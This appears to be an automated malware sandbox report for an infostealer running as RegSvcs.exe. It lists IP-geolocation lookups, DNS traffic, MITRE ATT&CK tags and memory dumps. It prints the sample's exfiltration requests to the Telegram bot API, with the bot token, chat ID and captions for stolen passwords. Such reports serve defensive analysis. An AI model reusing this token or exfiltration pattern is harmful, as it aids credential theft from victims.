HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200

HTTP Request

GET http://checkip.dyndns.org/

HTTP Response

200
104.21.67.152:443

https://reallyfreegeoip.org/xml/181.215.176.83

tls, http

RegSvcs.exe

2.2kB
15.2kB
25
18

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200

HTTP Request

GET https://reallyfreegeoip.org/xml/181.215.176.83

HTTP Response

200
149.154.167.220:443

https://api.telegram.org/bot7157329086:AAGOsSc2V0wvMRyvFFXhUVN6YYkkxDpjHDU/sendDocument?chat_id=7337843299&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20Admin%20%7C%20VIP%20Recovery

tls, http

RegSvcs.exe

2.3kB
7.8kB
14
14

HTTP Request

GET https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:OFGADUSE%0D%0ADate%20and%20Time:%2012/1/2024%20/%203:55:54%20PM%0D%0ACountry%20Name:%20United%20Kingdom%0D%0A%5B%20OFGADUSE%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D

HTTP Response

404

HTTP Request

POST https://api.telegram.org/bot7157329086:AAGOsSc2V0wvMRyvFFXhUVN6YYkkxDpjHDU/sendDocument?chat_id=7337843299&caption=%20Pc%20Name:%20Admin%20%7C%20/%20VIP%20Recovery%20%5C%0D%0A%0D%0APW%20%7C%20Admin%20%7C%20VIP%20Recovery

HTTP Response

200

8.8.8.8:53

8.8.8.8.in-addr.arpa

dns

198 B
90 B
3
1

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

8.8.8.8.in-addr.arpa

DNS Request

8.8.8.8.in-addr.arpa
8.8.8.8:53

58.55.71.13.in-addr.arpa

dns

70 B
144 B
1
1

DNS Request

58.55.71.13.in-addr.arpa
8.8.8.8:53

checkip.dyndns.org

dns

RegSvcs.exe

64 B
176 B
1
1

DNS Request

checkip.dyndns.org

DNS Response

132.226.247.73

193.122.6.168

132.226.8.169

158.101.44.242

193.122.130.0
8.8.8.8:53

101.209.201.84.in-addr.arpa

dns

73 B
133 B
1
1

DNS Request

101.209.201.84.in-addr.arpa
8.8.8.8:53

68.32.126.40.in-addr.arpa

dns

71 B
157 B
1
1

DNS Request

68.32.126.40.in-addr.arpa
8.8.8.8:53

95.221.229.192.in-addr.arpa

dns

73 B
144 B
1
1

DNS Request

95.221.229.192.in-addr.arpa
8.8.8.8:53

reallyfreegeoip.org

dns

RegSvcs.exe

65 B
97 B
1
1

DNS Request

reallyfreegeoip.org

DNS Response

104.21.67.152

172.67.177.134
8.8.8.8:53

73.247.226.132.in-addr.arpa

dns

73 B
158 B
1
1

DNS Request

73.247.226.132.in-addr.arpa
8.8.8.8:53

152.67.21.104.in-addr.arpa

dns

72 B
134 B
1
1

DNS Request

152.67.21.104.in-addr.arpa
8.8.8.8:53

api.telegram.org

dns

RegSvcs.exe

62 B
78 B
1
1

DNS Request

api.telegram.org

DNS Response

149.154.167.220
8.8.8.8:53

220.167.154.149.in-addr.arpa

dns

74 B
167 B
1
1

DNS Request

220.167.154.149.in-addr.arpa
8.8.8.8:53

97.17.167.52.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

97.17.167.52.in-addr.arpa
8.8.8.8:53

28.118.140.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

28.118.140.52.in-addr.arpa
8.8.8.8:53

241.150.49.20.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

241.150.49.20.in-addr.arpa
8.8.8.8:53

212.20.149.52.in-addr.arpa

dns

72 B
146 B
1
1

DNS Request

212.20.149.52.in-addr.arpa
8.8.8.8:53

206.23.85.13.in-addr.arpa

dns

71 B
145 B
1
1

DNS Request

206.23.85.13.in-addr.arpa
8.8.8.8:53

107.12.20.2.in-addr.arpa

dns

70 B
133 B
1
1

DNS Request

107.12.20.2.in-addr.arpa
8.8.8.8:53

172.214.232.199.in-addr.arpa

dns

74 B
128 B
1
1

DNS Request

172.214.232.199.in-addr.arpa
8.8.8.8:53

29.243.111.52.in-addr.arpa

dns

72 B
158 B
1
1

DNS Request

29.243.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Browser Information Discovery

T1217

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Email Collection

T1114

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/836-12-0x00000000736BE000-0x00000000736BF000-memory.dmp

Filesize
4KB

Download
memory/836-7-0x0000000000400000-0x0000000000448000-memory.dmp

Filesize
288KB

Download
memory/836-8-0x00000000736BE000-0x00000000736BF000-memory.dmp

Filesize
4KB

Download
memory/836-9-0x0000000005960000-0x0000000005F04000-memory.dmp

Filesize
5.6MB

Download
memory/836-10-0x00000000053B0000-0x000000000544C000-memory.dmp

Filesize
624KB

Download
memory/836-11-0x00000000736B0000-0x0000000073E60000-memory.dmp

Filesize
7.7MB

Download
memory/836-13-0x00000000736B0000-0x0000000073E60000-memory.dmp

Filesize
7.7MB

Download
memory/836-14-0x00000000066E0000-0x00000000068A2000-memory.dmp

Filesize
1.8MB

Download
memory/836-15-0x0000000006560000-0x00000000065B0000-memory.dmp

Filesize
320KB

Download
memory/836-16-0x0000000006DE0000-0x000000000730C000-memory.dmp

Filesize
5.2MB

Download
memory/836-17-0x0000000006640000-0x00000000066D2000-memory.dmp

Filesize
584KB

Download
memory/836-18-0x0000000001020000-0x000000000102A000-memory.dmp

Filesize
40KB

Download
memory/3136-6-0x0000000001530000-0x0000000001930000-memory.dmp

Filesize
4.0MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Signatures

Processes

Network

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

HTTP Request

HTTP Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Response

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

DNS Request

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

We care about your privacy.